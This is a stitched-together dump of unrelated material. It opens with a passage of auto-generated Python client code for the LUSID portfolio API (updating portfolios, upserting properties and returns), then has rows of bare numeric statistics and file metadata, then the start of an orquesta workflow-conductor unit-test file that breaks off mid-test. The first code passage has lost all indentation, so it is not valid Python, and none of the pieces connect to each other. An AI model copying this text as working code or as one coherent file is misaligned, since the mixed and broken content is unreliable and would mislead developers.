"""UpdatePortfolio: Update portfolio # noqa: E501
Update the definition of a particular portfolio. Note that not all elements of a portfolio definition are modifiable due to the potential implications for data already stored. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_portfolio_with_http_info(scope, code, update_portfolio_request, async_req=True)
>>> result = thread.get()
:param scope: The scope of the portfolio. (required)
:type scope: str
:param code: The code of the portfolio. Together with the scope this uniquely identifies the portfolio. (required)
:type code: str
:param update_portfolio_request: The updated portfolio definition. (required)
:type update_portfolio_request: UpdatePortfolioRequest
:param effective_at: The effective datetime or cut label at which to update the definition. Defaults to the current LUSID system datetime if not specified.
:type effective_at: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(Portfolio, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'scope',
'code',
'update_portfolio_request',
'effective_at'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_portfolio" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'update_portfolio_request' is set
if self.api_client.client_side_validation and ('update_portfolio_request' not in local_var_params or # noqa: E501
local_var_params['update_portfolio_request'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `update_portfolio_request` when calling `update_portfolio`") # noqa: E501
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `update_portfolio`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `update_portfolio`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `update_portfolio`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if self.api_client.client_side_validation and ('code' in local_var_params and # noqa: E501
len(local_var_params['code']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `update_portfolio`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('code' in local_var_params and # noqa: E501
len(local_var_params['code']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `update_portfolio`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `update_portfolio`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'scope' in local_var_params:
path_params['scope'] = local_var_params['scope'] # noqa: E501
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
query_params = []
if 'effective_at' in local_var_params and local_var_params['effective_at'] is not None: # noqa: E501
query_params.append(('effectiveAt', local_var_params['effective_at'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'update_portfolio_request' in local_var_params:
body_params = local_var_params['update_portfolio_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/json', 'text/json', 'application/*+json']) # noqa: E501
# set the LUSID header
header_params['X-LUSID-SDK-Language'] = 'Python'
header_params['X-LUSID-SDK-Version'] = '0.11.3648'
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "Portfolio",
400: "LusidValidationProblemDetails",
}
return self.api_client.call_api(
'/api/portfolios/{scope}/{code}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def upsert_portfolio_properties(self, scope, code, request_body, **kwargs): # noqa: E501
"""UpsertPortfolioProperties: Upsert portfolio properties # noqa: E501
Create or update one or more properties for a particular portfolio. A property is updated if it already exists and created if it does not. All properties must be from the 'Portfolio' domain. Properties have an <i>effectiveFrom</i> datetime from which the property is valid, and an <i>effectiveUntil</i> datetime until which it is valid. Not supplying an <i>effectiveUntil</i> datetime results in the property being valid indefinitely, or until the next <i>effectiveFrom</i> datetime of the property. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.upsert_portfolio_properties(scope, code, request_body, async_req=True)
>>> result = thread.get()
:param scope: The scope of the portfolio. (required)
:type scope: str
:param code: The code of the portfolio. Together with the scope this uniquely identifies the portfolio. (required)
:type code: str
:param request_body: The properties to be created or updated. Each property in the request must be keyed by its unique property key. This has the format {domain}/{scope}/{code}, for example 'Portfolio/Manager/Id'. (required)
:type request_body: dict(str, ModelProperty)
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: PortfolioProperties
"""
kwargs['_return_http_data_only'] = True
return self.upsert_portfolio_properties_with_http_info(scope, code, request_body, **kwargs) # noqa: E501
def upsert_portfolio_properties_with_http_info(self, scope, code, request_body, **kwargs): # noqa: E501
"""UpsertPortfolioProperties: Upsert portfolio properties # noqa: E501
Create or update one or more properties for a particular portfolio. A property is updated if it already exists and created if it does not. All properties must be from the 'Portfolio' domain. Properties have an <i>effectiveFrom</i> datetime from which the property is valid, and an <i>effectiveUntil</i> datetime until which it is valid. Not supplying an <i>effectiveUntil</i> datetime results in the property being valid indefinitely, or until the next <i>effectiveFrom</i> datetime of the property. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.upsert_portfolio_properties_with_http_info(scope, code, request_body, async_req=True)
>>> result = thread.get()
:param scope: The scope of the portfolio. (required)
:type scope: str
:param code: The code of the portfolio. Together with the scope this uniquely identifies the portfolio. (required)
:type code: str
:param request_body: The properties to be created or updated. Each property in the request must be keyed by its unique property key. This has the format {domain}/{scope}/{code}, for example 'Portfolio/Manager/Id'. (required)
:type request_body: dict(str, ModelProperty)
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(PortfolioProperties, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'scope',
'code',
'request_body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method upsert_portfolio_properties" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'request_body' is set
if self.api_client.client_side_validation and ('request_body' not in local_var_params or # noqa: E501
local_var_params['request_body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `request_body` when calling `upsert_portfolio_properties`") # noqa: E501
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `upsert_portfolio_properties`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `upsert_portfolio_properties`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `upsert_portfolio_properties`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if self.api_client.client_side_validation and ('code' in local_var_params and # noqa: E501
len(local_var_params['code']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `upsert_portfolio_properties`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('code' in local_var_params and # noqa: E501
len(local_var_params['code']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `upsert_portfolio_properties`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `upsert_portfolio_properties`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'scope' in local_var_params:
path_params['scope'] = local_var_params['scope'] # noqa: E501
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'request_body' in local_var_params:
body_params = local_var_params['request_body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/json', 'text/json', 'application/*+json']) # noqa: E501
# set the LUSID header
header_params['X-LUSID-SDK-Language'] = 'Python'
header_params['X-LUSID-SDK-Version'] = '0.11.3648'
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "PortfolioProperties",
400: "LusidValidationProblemDetails",
}
return self.api_client.call_api(
'/api/portfolios/{scope}/{code}/properties', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def upsert_portfolio_returns(self, scope, code, return_scope, return_code, performance_return, **kwargs): # noqa: E501
"""[EARLY ACCESS] UpsertPortfolioReturns: Upsert Returns # noqa: E501
Update or insert returns into the specified portfolio. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.upsert_portfolio_returns(scope, code, return_scope, return_code, performance_return, async_req=True)
>>> result = thread.get()
:param scope: The scope of the Portfolio. (required)
:type scope: str
:param code: The code of the Portfolio. (required)
:type code: str
:param return_scope: The scope of the Returns. (required)
:type return_scope: str
:param return_code: The code of the Returns. (required)
:type return_code: str
:param performance_return: This contains the Returns which need to be upsert. (required)
:type performance_return: list[PerformanceReturn]
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: UpsertReturnsResponse
"""
kwargs['_return_http_data_only'] = True
return self.upsert_portfolio_returns_with_http_info(scope, code, return_scope, return_code, performance_return, **kwargs) # noqa: E501
def upsert_portfolio_returns_with_http_info(self, scope, code, return_scope, return_code, performance_return, **kwargs): # noqa: E501
"""[EARLY ACCESS] UpsertPortfolioReturns: Upsert Returns # noqa: E501
Update or insert returns into the specified portfolio. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.upsert_portfolio_returns_with_http_info(scope, code, return_scope, return_code, performance_return, async_req=True)
>>> result = thread.get()
:param scope: The scope of the Portfolio. (required)
:type scope: str
:param code: The code of the Portfolio. (required)
:type code: str
:param return_scope: The scope of the Returns. (required)
:type return_scope: str
:param return_code: The code of the Returns. (required)
:type return_code: str
:param performance_return: This contains the Returns which need to be upsert. (required)
:type performance_return: list[PerformanceReturn]
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(UpsertReturnsResponse, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'scope',
'code',
'return_scope',
'return_code',
'performance_return'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method upsert_portfolio_returns" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'performance_return' is set
if self.api_client.client_side_validation and ('performance_return' not in local_var_params or # noqa: E501
local_var_params['performance_return'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `performance_return` when calling `upsert_portfolio_returns`") # noqa: E501
collection_formats = {}
path_params = {}
if 'scope' in local_var_params:
path_params['scope'] = local_var_params['scope'] # noqa: E501
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
if 'return_scope' in local_var_params:
path_params['returnScope'] = local_var_params['return_scope'] # noqa: E501
if 'return_code' in local_var_params:
path_params['returnCode'] = local_var_params['return_code'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'performance_return' in local_var_params:
body_params = local_var_params['performance_return']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/json', 'text/json', 'application/*+json']) # noqa: E501
# set the LUSID header
header_params['X-LUSID-SDK-Language'] = 'Python'
header_params['X-LUSID-SDK-Version'] = '0.11.3648'
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "UpsertReturnsResponse",
400: "LusidValidationProblemDetails",
}
return self.api_client.call_api(
'/api/portfolios/{scope}/{code}/returns/{returnScope}/{returnCode}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
| 56.226116
| 539
| 0.625425
| 16,039
| 134,774
| 5.042085
| 0.025874
| 0.043823
| 0.07219
| 0.025918
| 0.984172
| 0.9805
| 0.976221
| 0.974614
| 0.970879
| 0.967874
| 0
| 0.017197
| 0.296734
| 134,774
| 2,396
| 540
| 56.249583
| 0.836024
| 0.466507
| 0
| 0.769643
| 1
| 0.045536
| 0.258753
| 0.062374
| 0
| 0
| 0
| 0
| 0
| 1
| 0.024107
| false
| 0
| 0.004464
| 0
| 0.052679
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
acd36f6ba3cfc6033f61428d25abd2fa07a4886f
| 69,644
|
py
|
Python
|
orquesta/tests/unit/conducting/test_workflow_conductor_with_items.py
|
batk0/orquesta
|
f03f3f2f3820bf111a9277f4f6c5d6c83a89d004
|
[
"Apache-2.0"
] | null | null | null |
orquesta/tests/unit/conducting/test_workflow_conductor_with_items.py
|
batk0/orquesta
|
f03f3f2f3820bf111a9277f4f6c5d6c83a89d004
|
[
"Apache-2.0"
] | null | null | null |
orquesta/tests/unit/conducting/test_workflow_conductor_with_items.py
|
batk0/orquesta
|
f03f3f2f3820bf111a9277f4f6c5d6c83a89d004
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from orquesta import conducting
from orquesta import events
from orquesta.specs import native as specs
from orquesta import states
from orquesta.tests.unit import base
class WorkflowConductorWithItemsTest(base.WorkflowConductorWithItemsTest):
def test_empty_items_list(self):
wf_def = """
version: 1.0
vars:
- xs: []
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': []}
task_action_specs = []
mock_ac_ex_states = []
expected_task_states = [states.SUCCEEDED]
expected_workflow_states = [states.SUCCEEDED]
self.assert_task_items(
conductor,
task_name,
task_ctx,
task_ctx['xs'],
task_action_specs,
mock_ac_ex_states,
expected_task_states,
expected_workflow_states
)
# Assert the task is removed from staging.
self.assertNotIn(task_name, conductor.flow.staged)
# Assert the workflow succeeded.
self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
# Assert the workflow output is correct.
expected_output = {'items': []}
self.assertDictEqual(conductor.get_workflow_output(), expected_output)
def test_basic_items_list(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
mock_ac_ex_states = [states.SUCCEEDED] * 4
expected_task_states = [states.RUNNING] * 3 + [states.SUCCEEDED]
expected_workflow_states = [states.RUNNING] * 3 + [states.SUCCEEDED]
self.assert_task_items(
conductor,
task_name,
task_ctx,
task_ctx['xs'],
task_action_specs,
mock_ac_ex_states,
expected_task_states,
expected_workflow_states
)
# Assert the task is removed from staging.
self.assertNotIn(task_name, conductor.flow.staged)
# Assert the workflow succeeded.
self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
# Assert the workflow output is correct.
expected_output = {'items': task_ctx['xs']}
self.assertDictEqual(conductor.get_workflow_output(), expected_output)
def test_basic_items_list_with_concurrency(self):
wf_def = """
version: 1.0
vars:
- concurrency: 2
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with:
items: <% ctx(xs) %>
concurrency: <% ctx(concurrency) %>
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
concurrency = 2
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum'], 'concurrency': 2}
task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
mock_ac_ex_states = [states.SUCCEEDED] * 4
expected_task_states = [states.RUNNING] * 3 + [states.SUCCEEDED]
expected_workflow_states = [states.RUNNING] * 3 + [states.SUCCEEDED]
self.assert_task_items(
conductor,
task_name,
task_ctx,
task_ctx['xs'],
task_action_specs,
mock_ac_ex_states,
expected_task_states,
expected_workflow_states,
concurrency=concurrency
)
# Assert the task is removed from staging.
self.assertNotIn(task_name, conductor.flow.staged)
# Assert the workflow succeeded.
self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
def test_multiple_items_list(self):
wf_def = """
version: 1.0
vars:
- xs:
- foo
- fu
- marco
- ys:
- bar
- bar
- polo
tasks:
task1:
with: x, y in <% zip(ctx(xs), ctx(ys)) %>
action: core.echo message=<% item(x) + item(y) %>
"""
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': ['foo', 'fu', 'marco'], 'ys': ['bar', 'bar', 'polo']}
task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'foobar'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fubar'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'marcopolo'}, 'item_id': 2},
]
mock_ac_ex_states = [states.SUCCEEDED] * 3
expected_task_states = [states.RUNNING] * 2 + [states.SUCCEEDED]
expected_workflow_states = [states.RUNNING] * 2 + [states.SUCCEEDED]
self.assert_task_items(
conductor,
task_name,
task_ctx,
[i[0] + i[1] for i in zip(task_ctx['xs'], task_ctx['ys'])],
task_action_specs,
mock_ac_ex_states,
expected_task_states,
expected_workflow_states
)
# Assert the task is removed from staging.
self.assertNotIn(task_name, conductor.flow.staged)
# Assert the workflow succeeded.
self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
def test_multiple_items_list_with_concurrency(self):
wf_def = """
version: 1.0
vars:
- xs:
- foo
- fu
- marco
- ys:
- bar
- bar
- polo
tasks:
task1:
with:
items: x, y in <% zip(ctx(xs), ctx(ys)) %>
concurrency: 1
action: core.echo message=<% item(x) + item(y) %>
"""
concurrency = 1
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': ['foo', 'fu', 'marco'], 'ys': ['bar', 'bar', 'polo']}
task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'foobar'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fubar'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'marcopolo'}, 'item_id': 2},
]
mock_ac_ex_states = [states.SUCCEEDED] * 3
expected_task_states = [states.RUNNING] * 2 + [states.SUCCEEDED]
expected_workflow_states = [states.RUNNING] * 2 + [states.SUCCEEDED]
self.assert_task_items(
conductor,
task_name,
task_ctx,
[i[0] + i[1] for i in zip(task_ctx['xs'], task_ctx['ys'])],
task_action_specs,
mock_ac_ex_states,
expected_task_states,
expected_workflow_states,
concurrency=concurrency
)
# Assert the task is removed from staging.
self.assertNotIn(task_name, conductor.flow.staged)
# Assert the workflow succeeded.
self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
def test_failed_item_task_dormant(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
"""
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
mock_ac_ex_states = [states.SUCCEEDED, states.FAILED]
expected_task_states = [states.RUNNING, states.FAILED]
expected_workflow_states = [states.RUNNING, states.FAILED]
self.assert_task_items(
conductor,
task_name,
task_ctx,
task_ctx['xs'],
task_action_specs,
mock_ac_ex_states,
expected_task_states,
expected_workflow_states
)
# Assert the task is removed from staging.
self.assertNotIn(task_name, conductor.flow.staged)
# Assert the workflow failed.
self.assertEqual(conductor.get_workflow_state(), states.FAILED)
def test_failed_item_task_active(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
"""
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
mock_ac_ex_states = [states.SUCCEEDED, states.FAILED, states.SUCCEEDED, states.SUCCEEDED]
expected_task_states = [states.RUNNING] * 3 + [states.FAILED]
expected_workflow_states = [states.RUNNING] * 3 + [states.FAILED]
self.assert_task_items(
conductor,
task_name,
task_ctx,
task_ctx['xs'],
task_action_specs,
mock_ac_ex_states,
expected_task_states,
expected_workflow_states
)
# Assert the task is removed from staging.
self.assertNotIn(task_name, conductor.flow.staged)
# Assert the workflow failed.
self.assertEqual(conductor.get_workflow_state(), states.FAILED)
def test_failed_item_task_dormant_with_concurrency(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with:
items: <% ctx(xs) %>
concurrency: 2
action: core.echo message=<% item() %>
"""
concurrency = 2
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
mock_ac_ex_states = [states.SUCCEEDED, states.FAILED]
expected_task_states = [states.RUNNING, states.FAILED]
expected_workflow_states = [states.RUNNING, states.FAILED]
self.assert_task_items(
conductor,
task_name,
task_ctx,
task_ctx['xs'],
task_action_specs,
mock_ac_ex_states,
expected_task_states,
expected_workflow_states,
concurrency=concurrency
)
# Assert the task is removed from staging.
self.assertNotIn(task_name, conductor.flow.staged)
# Assert the workflow failed.
self.assertEqual(conductor.get_workflow_state(), states.FAILED)
def test_failed_item_task_active_with_concurrency(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with:
